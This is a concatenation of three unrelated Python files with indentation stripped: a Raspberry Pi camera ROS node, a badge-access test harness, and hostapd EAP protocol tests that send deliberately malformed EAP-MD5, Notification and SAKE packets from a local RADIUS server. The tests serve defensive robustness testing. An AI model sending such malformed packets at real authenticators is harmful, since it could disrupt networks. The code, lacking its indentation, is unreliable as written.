self.camera.resolution = resolution
self.camera.framerate = framerate
self.rawCapture = PiRGBArray(self.camera, size=resolution)
self.stream = self.camera.capture_continuous(self.rawCapture,
format="bgr", use_video_port=True)
self.frame = None
self.stopped = False
def start(self):
Thread(target=self.update, args=()).start()
return self
def update(self):
for f in self.stream:
self.frame = f.array
self.rawCapture.truncate(0)
if self.stopped:
self.stream.close()
self.rawCapture.close()
self.camera.close()
return
def read(self):
return self.frame
def stop(self):
self.stopped = True
def main(args):
rospy.init_node('camera_rpi', anonymous=True)
image_pub = rospy.Publisher("image",Image, queue_size=1)
image_pub_compressed = rospy.Publisher("image/compressed",CompressedImage,queue_size=1)
bridge = CvBridge()
print("Starting Camera Node")
camera_stream = PiVideoStream().start()
time.sleep(2.0)
# limit publish frame rate
r = rospy.Rate(60)
while not rospy.is_shutdown():
start_time = time.time()
frame = camera_stream.read()
#frame = imutils.resize(frame, width=400)
#print("--- %s camera capture seconds ---" % (time.time() - start_time))
ros_start_time = time.time()
#image_pub.publish(bridge.cv2_to_imgmsg(frame, encoding="bgr8"))
## Create compressed image message
msg = CompressedImage()
msg.header.stamp = rospy.Time.now()
msg.format = "jpeg"
msg.data = np.array(cv2.imencode('.jpg', frame)[1]).tostring()
## publish compressed image
image_pub_compressed.publish(msg)
#print("--- %s ros seconds ---" % (time.time() - ros_start_time))
r.sleep()
if __name__ == '__main__':
main(sys.argv)
|
VirtualDevice.py | from __future__ import absolute_import
import sys
import time
import threading
import serial
import smbus2 as smbus
from mock import patch, Mock
from tinker_access_client.tinker_access_client.Client import Client
from tinker_access_client.tinker_access_client.ClientOption import ClientOption
from tests.integration.utils.VirtualRpi import VirtualRpi
from tinker_access_client.tests.integration.utils.VirtualSerial import VirtualSerial
update_status = Client.update_status
class VirtualDevice(object):
def __init__(self, opts):
self.__opts = opts
self.__displays = []
self.__client = None
self.__transitions = []
self.__virtual_rpi = VirtualRpi(opts)
self.__virtual_serial = VirtualSerial()
self.__lcd_patcher = patch.object(smbus, 'SMBus', return_value=Mock())
self.__lcd_patcher.start()
#TODO: should only patch if the address, matches the option for the serial address
self.__serial_patcher = patch.object(serial, 'Serial', return_value=self.__virtual_serial)
self.__serial_patcher.start()
self.__client__update_status = patch.object(Client, 'update_status', side_effect=self.__update__status, autospec=True)
self.__client__update_status.start()
def __update__status(self, *args, **kwargs):
self.__client = args[0]
self.__transitions.append(self.__client.status())
update_status(self.__client, *args, **kwargs)
def __enter__(self):
sys.meta_path.append(self.__virtual_rpi)
def run():
Client.run(self.__opts, [])
t = threading.Thread(target=run)
t.daemon = True
t.start()
time.sleep(1)
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.__client__update_status.stop()
self.__serial_patcher.stop()
self.__lcd_patcher.stop()
[sys.meta_path.remove(meta) for meta in sys.meta_path if meta is self.__virtual_rpi]
def transitions(self):
return self.__transitions
def status(self):
return self.__client.status() if self.__client is not None else None
def scan_badge(self, badge_code):
self.__virtual_serial.scan_badge(badge_code)
def hold_logout(self, hold_time=None):
pin_logout = self.__opts.get(ClientOption.PIN_LOGOUT)
hold_time = hold_time if hold_time is not None else 0.5
self.__virtual_rpi.write_pin(pin_logout, True)
def reset_pin():
time.sleep(hold_time)
self.__virtual_rpi.write_pin(pin_logout, False)
t = threading.Thread(target=reset_pin)
t.daemon = True
t.start()
def read_pin(self, pin):
return self.__virtual_rpi.read_pin(pin)
|
test_eap_proto.py | # EAP protocol tests
# Copyright (c) 2014-2015, Jouni Malinen <j@w1.fi>
#
# This software may be distributed under the terms of the BSD license.
# See README for more details.
import binascii
import hashlib
import hmac
import logging
logger = logging.getLogger()
import os
import select
import struct
import threading
import time
import hostapd
from utils import HwsimSkip, alloc_fail, fail_test, wait_fail_trigger
from test_ap_eap import check_eap_capa, check_hlr_auc_gw_support, int_eap_server_params
from test_erp import check_erp_capa
try:
import OpenSSL
openssl_imported = True
except ImportError:
openssl_imported = False
EAP_CODE_REQUEST = 1
EAP_CODE_RESPONSE = 2
EAP_CODE_SUCCESS = 3
EAP_CODE_FAILURE = 4
EAP_CODE_INITIATE = 5
EAP_CODE_FINISH = 6
EAP_TYPE_IDENTITY = 1
EAP_TYPE_NOTIFICATION = 2
EAP_TYPE_NAK = 3
EAP_TYPE_MD5 = 4
EAP_TYPE_OTP = 5
EAP_TYPE_GTC = 6
EAP_TYPE_TLS = 13
EAP_TYPE_LEAP = 17
EAP_TYPE_SIM = 18
EAP_TYPE_TTLS = 21
EAP_TYPE_AKA = 23
EAP_TYPE_PEAP = 25
EAP_TYPE_MSCHAPV2 = 26
EAP_TYPE_TLV = 33
EAP_TYPE_TNC = 38
EAP_TYPE_FAST = 43
EAP_TYPE_PAX = 46
EAP_TYPE_PSK = 47
EAP_TYPE_SAKE = 48
EAP_TYPE_IKEV2 = 49
EAP_TYPE_AKA_PRIME = 50
EAP_TYPE_GPSK = 51
EAP_TYPE_PWD = 52
EAP_TYPE_EKE = 53
EAP_TYPE_EXPANDED = 254
# Type field in EAP-Initiate and EAP-Finish messages
EAP_ERP_TYPE_REAUTH_START = 1
EAP_ERP_TYPE_REAUTH = 2
EAP_ERP_TLV_KEYNAME_NAI = 1
EAP_ERP_TV_RRK_LIFETIME = 2
EAP_ERP_TV_RMSK_LIFETIME = 3
EAP_ERP_TLV_DOMAIN_NAME = 4
EAP_ERP_TLV_CRYPTOSUITES = 5
EAP_ERP_TLV_AUTHORIZATION_INDICATION = 6
EAP_ERP_TLV_CALLED_STATION_ID = 128
EAP_ERP_TLV_CALLING_STATION_ID = 129
EAP_ERP_TLV_NAS_IDENTIFIER = 130
EAP_ERP_TLV_NAS_IP_ADDRESS = 131
EAP_ERP_TLV_NAS_IPV6_ADDRESS = 132
def run_pyrad_server(srv, t_stop, eap_handler):
srv.RunWithStop(t_stop, eap_handler)
def start_radius_server(eap_handler):
try:
import pyrad.server
import pyrad.packet
import pyrad.dictionary
except ImportError:
raise HwsimSkip("No pyrad modules available")
class TestServer(pyrad.server.Server):
def _HandleAuthPacket(self, pkt):
pyrad.server.Server._HandleAuthPacket(self, pkt)
eap = ""
for p in pkt[79]:
eap += p
eap_req = self.eap_handler(self.ctx, eap)
reply = self.CreateReplyPacket(pkt)
if eap_req:
while True:
if len(eap_req) > 253:
reply.AddAttribute("EAP-Message", eap_req[0:253])
eap_req = eap_req[253:]
else:
reply.AddAttribute("EAP-Message", eap_req)
break
else:
logger.info("No EAP request available")
reply.code = pyrad.packet.AccessChallenge
hmac_obj = hmac.new(reply.secret)
hmac_obj.update(struct.pack("B", reply.code))
hmac_obj.update(struct.pack("B", reply.id))
# reply attributes
reply.AddAttribute("Message-Authenticator",
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00")
attrs = reply._PktEncodeAttributes()
# Length
flen = 4 + 16 + len(attrs)
hmac_obj.update(struct.pack(">H", flen))
hmac_obj.update(pkt.authenticator)
hmac_obj.update(attrs)
del reply[80]
reply.AddAttribute("Message-Authenticator", hmac_obj.digest())
self.SendReplyPacket(pkt.fd, reply)
def RunWithStop(self, t_stop, eap_handler):
self._poll = select.poll()
self._fdmap = {}
self._PrepareSockets()
self.t_stop = t_stop
self.eap_handler = eap_handler
self.ctx = {}
while not t_stop.is_set():
for (fd, event) in self._poll.poll(200):
if event == select.POLLIN:
try:
fdo = self._fdmap[fd]
self._ProcessInput(fdo)
except pyrad.server.ServerPacketError as err:
logger.info("pyrad server dropping packet: " + str(err))
except pyrad.packet.PacketError as err:
logger.info("pyrad server received invalid packet: " + str(err))
else:
logger.error("Unexpected event in pyrad server main loop")
srv = TestServer(dict=pyrad.dictionary.Dictionary("dictionary.radius"),
authport=18138, acctport=18139)
srv.hosts["127.0.0.1"] = pyrad.server.RemoteHost("127.0.0.1",
"radius",
"localhost")
srv.BindToAddress("")
t_stop = threading.Event()
t = threading.Thread(target=run_pyrad_server, args=(srv, t_stop, eap_handler))
t.start()
return { 'srv': srv, 'stop': t_stop, 'thread': t }
def stop_radius_server(srv):
srv['stop'].set()
srv['thread'].join()
def start_ap(ifname):
params = hostapd.wpa2_eap_params(ssid="eap-test")
params['auth_server_port'] = "18138"
hapd = hostapd.add_ap(ifname, params)
return hapd
def test_eap_proto(dev, apdev):
"""EAP protocol tests"""
check_eap_capa(dev[0], "MD5")
def eap_handler(ctx, req):
logger.info("eap_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] = ctx['num'] + 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
idx += 1
if ctx['num'] == idx:
logger.info("Test: MD5 challenge")
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_MD5,
1, 0xaa, ord('n'))
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Success - id off by 2")
return struct.pack(">BBH", EAP_CODE_SUCCESS, ctx['id'] + 1, 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: MD5 challenge")
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_MD5,
1, 0xaa, ord('n'))
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Success - id off by 3")
return struct.pack(">BBH", EAP_CODE_SUCCESS, ctx['id'] + 2, 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: MD5 challenge")
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_MD5,
1, 0xaa, ord('n'))
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Notification/Request")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_NOTIFICATION,
ord('A'))
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Success")
return struct.pack(">BBH", EAP_CODE_SUCCESS, ctx['id'] - 1, 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Notification/Request")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_NOTIFICATION,
ord('B'))
idx += 1
if ctx['num'] == idx:
logger.info("Test: MD5 challenge")
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_MD5,
1, 0xaa, ord('n'))
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Success")
return struct.pack(">BBH", EAP_CODE_SUCCESS, ctx['id'] - 1, 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Notification/Request")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_NOTIFICATION,
ord('C'))
idx += 1
if ctx['num'] == idx:
logger.info("Test: MD5 challenge")
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_MD5,
1, 0xaa, ord('n'))
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Notification/Request")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_NOTIFICATION,
ord('D'))
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Success")
return struct.pack(">BBH", EAP_CODE_SUCCESS, ctx['id'] - 1, 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Notification/Request")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_NOTIFICATION,
ord('E'))
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Notification/Request (same id)")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'] - 1,
4 + 1 + 1,
EAP_TYPE_NOTIFICATION,
ord('F'))
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected EAP-Success")
return struct.pack(">BBH", EAP_CODE_SUCCESS, ctx['id'] - 2, 4)
return None
srv = start_radius_server(eap_handler)
try:
hapd = start_ap(apdev[0]['ifname'])
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="MD5", identity="user", password="password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-SUCCESS"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP success")
dev[0].request("REMOVE_NETWORK all")
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="MD5", identity="user", password="password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-SUCCESS"], timeout=1)
if ev is not None:
raise Exception("Unexpected EAP success")
dev[0].request("REMOVE_NETWORK all")
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="MD5", identity="user", password="password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-NOTIFICATION"], timeout=10)
if ev is None:
raise Exception("Timeout on EAP notification")
if ev != "<3>CTRL-EVENT-EAP-NOTIFICATION A":
raise Exception("Unexpected notification contents: " + ev)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-SUCCESS"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP success")
dev[0].request("REMOVE_NETWORK all")
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="MD5", identity="user", password="password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-NOTIFICATION"], timeout=10)
if ev is None:
raise Exception("Timeout on EAP notification")
if ev != "<3>CTRL-EVENT-EAP-NOTIFICATION B":
raise Exception("Unexpected notification contents: " + ev)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-SUCCESS"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP success")
dev[0].request("REMOVE_NETWORK all")
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="MD5", identity="user", password="password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-NOTIFICATION"], timeout=10)
if ev is None:
raise Exception("Timeout on EAP notification")
if ev != "<3>CTRL-EVENT-EAP-NOTIFICATION C":
raise Exception("Unexpected notification contents: " + ev)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-NOTIFICATION"], timeout=10)
if ev is None:
raise Exception("Timeout on EAP notification")
if ev != "<3>CTRL-EVENT-EAP-NOTIFICATION D":
raise Exception("Unexpected notification contents: " + ev)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-SUCCESS"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP success")
dev[0].request("REMOVE_NETWORK all")
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="MD5", identity="user", password="password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-NOTIFICATION"], timeout=10)
if ev is None:
raise Exception("Timeout on EAP notification")
if ev != "<3>CTRL-EVENT-EAP-NOTIFICATION E":
raise Exception("Unexpected notification contents: " + ev)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-NOTIFICATION"], timeout=10)
if ev is None:
raise Exception("Timeout on EAP notification")
if ev != "<3>CTRL-EVENT-EAP-NOTIFICATION F":
raise Exception("Unexpected notification contents: " + ev)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP failure")
dev[0].request("REMOVE_NETWORK all")
finally:
stop_radius_server(srv)
def test_eap_proto_notification_errors(dev, apdev):
"""EAP Notification errors"""
def eap_handler(ctx, req):
logger.info("eap_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] = ctx['num'] + 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
idx += 1
if ctx['num'] == idx:
logger.info("Test: MD5 challenge")
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_MD5,
1, 0xaa, ord('n'))
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Notification/Request")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_NOTIFICATION,
ord('A'))
idx += 1
if ctx['num'] == idx:
logger.info("Test: MD5 challenge")
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_MD5,
1, 0xaa, ord('n'))
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Notification/Request")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_NOTIFICATION,
ord('A'))
return None
srv = start_radius_server(eap_handler)
try:
hapd = start_ap(apdev[0]['ifname'])
with alloc_fail(dev[0], 1, "eap_sm_processNotify"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="MD5", identity="user", password="password",
wait_connect=False)
wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
with alloc_fail(dev[0], 1, "eap_msg_alloc;sm_EAP_NOTIFICATION_Enter"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="MD5", identity="user", password="password",
wait_connect=False)
wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
finally:
stop_radius_server(srv)
EAP_SAKE_VERSION = 2
EAP_SAKE_SUBTYPE_CHALLENGE = 1
EAP_SAKE_SUBTYPE_CONFIRM = 2
EAP_SAKE_SUBTYPE_AUTH_REJECT = 3
EAP_SAKE_SUBTYPE_IDENTITY = 4
EAP_SAKE_AT_RAND_S = 1
EAP_SAKE_AT_RAND_P = 2
EAP_SAKE_AT_MIC_S = 3
EAP_SAKE_AT_MIC_P = 4
EAP_SAKE_AT_SERVERID = 5
EAP_SAKE_AT_PEERID = 6
EAP_SAKE_AT_SPI_S = 7
EAP_SAKE_AT_SPI_P = 8
EAP_SAKE_AT_ANY_ID_REQ = 9
EAP_SAKE_AT_PERM_ID_REQ = 10
EAP_SAKE_AT_ENCR_DATA = 128
EAP_SAKE_AT_IV = 129
EAP_SAKE_AT_PADDING = 130
EAP_SAKE_AT_NEXT_TMPID = 131
EAP_SAKE_AT_MSK_LIFE = 132
def test_eap_proto_sake(dev, apdev):
"""EAP-SAKE protocol tests"""
global eap_proto_sake_test_done
eap_proto_sake_test_done = False
def sake_challenge(ctx):
logger.info("Test: Challenge subtype")
return struct.pack(">BBHBBBBBBLLLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 18,
EAP_TYPE_SAKE,
EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_CHALLENGE,
EAP_SAKE_AT_RAND_S, 18, 0, 0, 0, 0)
def sake_handler(ctx, req):
logger.info("sake_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] += 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing payload")
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'], 4 + 1,
EAP_TYPE_SAKE)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity subtype without any attributes")
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_SAKE,
EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_IDENTITY)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity subtype")
return struct.pack(">BBHBBBBBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_SAKE,
EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_IDENTITY,
EAP_SAKE_AT_ANY_ID_REQ, 4, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity subtype (different session id)")
return struct.pack(">BBHBBBBBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_SAKE,
EAP_SAKE_VERSION, 1, EAP_SAKE_SUBTYPE_IDENTITY,
EAP_SAKE_AT_PERM_ID_REQ, 4, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity subtype with too short attribute")
return struct.pack(">BBHBBBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 2,
EAP_TYPE_SAKE,
EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_IDENTITY,
EAP_SAKE_AT_ANY_ID_REQ, 2)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity subtype with truncated attribute")
return struct.pack(">BBHBBBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 2,
EAP_TYPE_SAKE,
EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_IDENTITY,
EAP_SAKE_AT_ANY_ID_REQ, 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity subtype with too short attribute header")
payload = struct.pack("B", EAP_SAKE_AT_ANY_ID_REQ)
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + len(payload),
EAP_TYPE_SAKE, EAP_SAKE_VERSION, 0,
EAP_SAKE_SUBTYPE_IDENTITY) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity subtype with AT_IV but not AT_ENCR_DATA")
payload = struct.pack("BB", EAP_SAKE_AT_IV, 2)
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + len(payload),
EAP_TYPE_SAKE, EAP_SAKE_VERSION, 0,
EAP_SAKE_SUBTYPE_IDENTITY) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity subtype with skippable and non-skippable unknown attribute")
payload = struct.pack("BBBB", 255, 2, 127, 2)
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + len(payload),
EAP_TYPE_SAKE, EAP_SAKE_VERSION, 0,
EAP_SAKE_SUBTYPE_IDENTITY) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity subtype: AT_RAND_P with invalid payload length")
payload = struct.pack("BB", EAP_SAKE_AT_RAND_P, 2)
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + len(payload),
EAP_TYPE_SAKE, EAP_SAKE_VERSION, 0,
EAP_SAKE_SUBTYPE_IDENTITY) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity subtype: AT_MIC_P with invalid payload length")
payload = struct.pack("BB", EAP_SAKE_AT_MIC_P, 2)
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + len(payload),
EAP_TYPE_SAKE, EAP_SAKE_VERSION, 0,
EAP_SAKE_SUBTYPE_IDENTITY) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity subtype: AT_PERM_ID_REQ with invalid payload length")
payload = struct.pack("BBBBBBBBBBBBBB",
EAP_SAKE_AT_SPI_S, 2,
EAP_SAKE_AT_SPI_P, 2,
EAP_SAKE_AT_ENCR_DATA, 2,
EAP_SAKE_AT_NEXT_TMPID, 2,
EAP_SAKE_AT_PERM_ID_REQ, 4, 0, 0,
EAP_SAKE_AT_PERM_ID_REQ, 2)
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + len(payload),
EAP_TYPE_SAKE, EAP_SAKE_VERSION, 0,
EAP_SAKE_SUBTYPE_IDENTITY) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity subtype: AT_PADDING")
payload = struct.pack("BBBBBB",
EAP_SAKE_AT_PADDING, 3, 0,
EAP_SAKE_AT_PADDING, 3, 1)
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + len(payload),
EAP_TYPE_SAKE, EAP_SAKE_VERSION, 0,
EAP_SAKE_SUBTYPE_IDENTITY) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity subtype: AT_MSK_LIFE")
payload = struct.pack(">BBLBBH",
EAP_SAKE_AT_MSK_LIFE, 6, 0,
EAP_SAKE_AT_MSK_LIFE, 4, 0)
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + len(payload),
EAP_TYPE_SAKE, EAP_SAKE_VERSION, 0,
EAP_SAKE_SUBTYPE_IDENTITY) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity subtype with invalid attribute length")
payload = struct.pack("BB", EAP_SAKE_AT_ANY_ID_REQ, 0)
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + len(payload),
EAP_TYPE_SAKE, EAP_SAKE_VERSION, 0,
EAP_SAKE_SUBTYPE_IDENTITY) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unknown subtype")
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_SAKE,
EAP_SAKE_VERSION, 0, 123)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge subtype without any attributes")
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_SAKE,
EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_CHALLENGE)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge subtype with too short AT_RAND_S")
return struct.pack(">BBHBBBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 2,
EAP_TYPE_SAKE,
EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_CHALLENGE,
EAP_SAKE_AT_RAND_S, 2)
idx += 1
if ctx['num'] == idx:
return sake_challenge(ctx)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected Identity subtype")
return struct.pack(">BBHBBBBBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_SAKE,
EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_IDENTITY,
EAP_SAKE_AT_ANY_ID_REQ, 4, 0)
idx += 1
if ctx['num'] == idx:
return sake_challenge(ctx)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected Challenge subtype")
return struct.pack(">BBHBBBBBBLLLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 18,
EAP_TYPE_SAKE,
EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_CHALLENGE,
EAP_SAKE_AT_RAND_S, 18, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
return sake_challenge(ctx)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Confirm subtype without any attributes")
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_SAKE,
EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_CONFIRM)
idx += 1
if ctx['num'] == idx:
return sake_challenge(ctx)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Confirm subtype with too short AT_MIC_S")
return struct.pack(">BBHBBBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 2,
EAP_TYPE_SAKE,
EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_CONFIRM,
EAP_SAKE_AT_MIC_S, 2)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected Confirm subtype")
return struct.pack(">BBHBBBBBBLLLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 18,
EAP_TYPE_SAKE,
EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_CONFIRM,
EAP_SAKE_AT_MIC_S, 18, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
return sake_challenge(ctx)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Confirm subtype with incorrect AT_MIC_S")
return struct.pack(">BBHBBBBBBLLLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 18,
EAP_TYPE_SAKE,
EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_CONFIRM,
EAP_SAKE_AT_MIC_S, 18, 0, 0, 0, 0)
global eap_proto_sake_test_done
if eap_proto_sake_test_done:
return sake_challenge(ctx)
logger.info("No more test responses available - test case completed")
eap_proto_sake_test_done = True
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
srv = start_radius_server(sake_handler)
try:
hapd = start_ap(apdev[0]['ifname'])
while not eap_proto_sake_test_done:
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="SAKE", identity="sake user",
password_hex="0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
